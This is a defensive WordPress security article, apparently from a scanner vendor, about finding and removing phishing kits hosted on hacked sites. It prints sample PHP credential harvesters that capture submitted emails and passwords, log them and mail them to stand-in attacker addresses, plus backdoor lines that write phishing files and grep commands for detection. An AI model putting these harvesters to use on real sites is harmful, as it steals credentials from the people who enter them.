Your WordPress site might be hosting a fake PayPal login page right now — and you'd never know, because it's in a subdirectory you never check.
Why attackers use WordPress for phishing
Compromised WordPress sites are the perfect phishing host:
- Established domain reputation — Your domain has a history, SSL certificate, and Google trust. Phishing pages hosted on your domain bypass email spam filters more easily than newly registered domains
- Free hosting — The attacker doesn't pay for hosting. You do
- Scale — Automated tools can deploy phishing kits to thousands of compromised WordPress sites simultaneously
- Stealth — Phishing pages are often in deep subdirectories that site owners never visit
What phishing kits look like
A typical phishing kit is a ZIP archive that extracts to a directory like:
/wp-content/uploads/2026/01/docs/
├── index.html ← Fake login page (PayPal, Microsoft, etc.)
├── post.php ← Credential harvesting script
├── style.css ← Cloned CSS from the real site
├── images/
│ ├── logo.png ← Stolen branding
│ └── bg.jpg
└── .htaccess ← Blocks certain IPs (security researchers)
The post.php script collects submitted credentials and either emails them to the attacker or writes them to a local file:
// Typical credential harvester
$email = $_POST['email'];
$pass = $_POST['password'];
$ip = $_SERVER['REMOTE_ADDR'];
$data = "Email: $email | Pass: $pass | IP: $ip\n";
file_put_contents('logs.txt', $data, FILE_APPEND);
// Also email to attacker
mail('attacker@proton.me', 'New catch', $data);
// Redirect victim to real site
header('Location: https://www.paypal.com/signin');
How to detect phishing on your site
Signs you might be hosting phishing pages
- Google Search Console warnings — "Deceptive content detected" in the Security Issues section. This is one of the key warning signs your WordPress site has been hacked
- Hosting provider notices — Abuse reports forwarded from anti-phishing organisations
- Unexpected traffic spikes — Sudden increase in traffic to URLs you don't recognise
- Email deliverability drops — Your domain may be blacklisted by email providers
- Browser warnings — Chrome showing "Deceptive site ahead" to your visitors
Using WO Security Shield to find phishing kits
WO Security Shield detects phishing kits by:
- Scanning the uploads directory — HTML files in
/wp-content/uploads/are flagged (legitimate WordPress uploads are media files, not HTML) - Detecting credential harvesting patterns — PHP files that read POST data and email it or write to files
- Identifying brand impersonation — Files containing references to PayPal, Microsoft, Apple, Google, bank login pages
- Monitoring .htaccess anomalies — Phishing kits often include .htaccess files that block security scanners by IP
Removal steps
1. Find all phishing directories
In your WO Security Shield dashboard, check the findings panel for:
- HTML files in upload directories
- PHP files with credential harvesting signatures
- Suspicious .htaccess files outside the WordPress root
2. Delete the phishing kit entirely
Remove the entire directory, not just individual files. Phishing kits often contain dozens of files. After removal, scan for PHP backdoors that the attacker may have planted elsewhere on your server.
3. Check for the entry point
The phishing kit didn't upload itself. Common entry points:
- Vulnerable file upload plugin — Contact Form 7 add-ons, custom upload handlers
- Compromised admin account — Check your user list and login logs. Strengthen your defenses with our WordPress login page security guide
- FTP/SFTP access — If the attacker has your credentials, they can upload directly
4. Request review from Google
If your site was flagged:
- Go to Google Search Console
- Navigate to Security & Manual Actions
- Click "Request a review" after removing the phishing content
5. Check blacklists
Your domain may be listed on anti-phishing blacklists. Check:
Phishing is one of the most damaging things that can happen to your domain's reputation. A single incident can get your site blacklisted across browsers, email providers, and search engines. Scan for phishing kits regularly with WO Security Shield.
How Attackers Install Phishing Pages
Understanding the installation process helps you prevent and detect phishing attacks:
Common Installation Methods
1. Through vulnerable file upload forms:
Attacker uploads a ZIP file containing:
├── index.html (fake login page — looks like PayPal, bank, etc.)
├── style.css (copied from the real site)
├── logo.png (copied from the real site)
├── submit.php (sends stolen credentials to attacker)
└── .htaccess (hides directory listing)
2. Through a PHP backdoor already on the server:
// The backdoor writes phishing files directly
file_put_contents('/wp-content/uploads/secure-login/index.html', $phishing_html);
file_put_contents('/wp-content/uploads/secure-login/submit.php', $credential_handler);
3. Through compromised WordPress admin access: The attacker uses the Theme Editor or Plugin Editor to inject phishing pages into existing theme directories where they blend in with legitimate files.
What a Phishing Kit Looks Like
A typical WordPress-hosted phishing page collects credentials and forwards them:
// submit.php — the credential harvester
<?php
$email = $_POST['email'];
$password = $_POST['password'];
$ip = $_SERVER['REMOTE_ADDR'];
$ua = $_SERVER['HTTP_USER_AGENT'];
// Send to attacker
$data = "Email: $email\nPassword: $password\nIP: $ip\nBrowser: $ua\n";
mail('attacker@example.com', 'New Catch', $data);
// Also log to a file the attacker retrieves later
file_put_contents('.logs.txt', $data, FILE_APPEND);
// Redirect victim to the real site so they don't suspect anything
header('Location: https://real-site.com/login');
exit;
?>
Detection: Finding Phishing Pages on Your Site
Automated scanning: WO Security Shield detects phishing pages by identifying:
- HTML files containing login forms that don't belong to WordPress
- CSS/images copied from known brands (banks, PayPal, Microsoft, etc.)
- PHP files that process POST data and send it via email or to external servers
Manual detection commands:
# Find HTML files outside normal WordPress locations
find /var/www/html/wp-content/uploads -name "*.html" -o -name "*.htm"
# Search for credential-harvesting patterns
grep -rl "\$_POST.*password\|\$_POST.*passwd" /var/www/html/wp-content/
# Find files that send emails with POST data
grep -rl "mail.*\$_POST" /var/www/html/wp-content/
# Look for hidden directories in uploads
find /var/www/html/wp-content/uploads -type d -name ".*"
The Consequences of Hosting Phishing Pages
Even though you didn't create the phishing page, hosting one has serious consequences:
| Consequence | Impact | Recovery time |
|---|---|---|
| Google Safe Browsing blacklist | "Deceptive site ahead" warning for ALL pages | 1-4 weeks |
| Domain blacklisted by email providers | Your emails go to spam | 2-8 weeks |
| Hosting account suspended | Site goes offline completely | Hours to days |
| Search ranking penalty | Significant drop in organic traffic | 1-3 months |
| Legal liability | Potential lawsuits from phishing victims | Varies |
The reputational damage from hosting a phishing page is often worse than hosting malware, because it directly harms real people who enter their credentials.